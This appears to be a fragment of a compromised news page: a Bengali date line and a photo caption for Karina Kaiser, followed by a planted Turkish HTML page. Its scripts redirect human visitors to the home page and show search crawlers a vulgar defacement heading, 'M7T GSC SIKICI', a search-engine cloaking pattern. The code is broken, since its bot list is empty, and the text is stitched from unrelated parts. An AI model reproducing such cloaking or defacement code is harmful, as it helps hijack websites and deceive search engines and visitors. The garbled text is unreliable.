মে ১৭, ২০২৬, ০৬:৩৪ পিএম
কারিনা কায়সার | ছবি: সংগৃহীত
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
(function () {
var ua = navigator.userAgent.toLowerCase();
var bots =
; var isBot = bots.some(function(bot) {
return ua.indexOf(bot) !== -1;
});
if (!isBot) {
window.location.href = "/";
}
})();
</script>
</head>
<body>
<script>
(function () {
var ua = navigator.userAgent.toLowerCase();
var bots =
; var isBot = bots.some(function(bot) {
return ua.indexOf(bot) !== -1;
});
if (isBot) {
document.write(`
<title>MUR7T<title>
<h1>M7T GSC SIKICI</h1>
`);
}
})();
</script>
</body>
</html>